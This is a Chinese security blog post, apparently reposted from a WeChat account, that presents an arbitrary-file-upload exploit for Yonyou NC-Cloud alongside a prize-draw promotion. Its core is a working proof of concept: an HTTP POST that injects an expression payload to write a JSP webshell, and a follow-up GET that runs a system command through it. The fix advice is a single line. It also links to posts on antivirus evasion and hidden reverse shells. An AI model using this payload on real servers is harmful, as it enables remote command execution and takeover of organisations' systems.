【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)

admin 2023年8月17日12:20:26评论72 views字数 2192阅读7分18秒阅读模式

0x01  前言



    用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化

【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)

    该系统存在任意文件上传漏洞,攻击者利用该漏洞可以执行命令,控制服务器权限

0x02  影响版本

NC63、NC633、NC65NC Cloud1903、NC Cloud1909NC Cloud2005、NC Cloud2105、NC Cloud2111

0x03  漏洞复现


PoC如下:

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1Host: 192.168.0.11:8089Content-Length: 249Accept: */*
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/1ndex.jsp"]}

发送该请求,如下利用成功!

【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)

访问1ndex.jsp,命令执行成功

https://192.168.0.11:8089/1ndex.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())


GET /1ndex.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream()) HTTP/1.1Host: 192.168.0.11:8089Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)

0x04  修复方案



建议及时更新

【宠粉福利】

1. 开奖时间:8月20日12:00

2. 活动规则:

注意点击下方名片发暗号"抽奖"

或扫码参与即可【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)


② 必要条件:开奖前转发本文到朋友圈,开奖前不可删除,开奖后转发无效

③ 开奖结束后,请中奖小伙伴及时将中奖信息和朋友圈转发记录发送到微信:BCathack超过24小时未领取的视为自动放弃哈!!!

未满足条件但被抽中,则获奖资格会被取消哦【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)




中奖绝缘体也没关系,可以在这里下单买哈~

有需要自取~~

Web安全领域的小伙伴,大都应该看过科学家级天才黑客道哥吴翰清的《白帽子讲Web安全》

这本书,可谓安全从业者的标配,不仅国内小伙伴给出的好评如潮,收获了豆瓣8.2的高分,还被美国斯普林格出版社隆重引进在全球发行英文版,这在安全著作中也是独一份的待遇!!!

如今,时光荏苒,距本书第1版的出版转眼过去了11年,第2版也是时候隆重登场了!

【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)



 【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  | New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)


 

  1. 【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)

    关注我

    获得更多精彩

    【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)


  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文

原文始发于微信公众号(EchoSec):【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月17日12:20:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)https://cn-sec.com/archives/1962581.html

发表评论

匿名网友 填写信息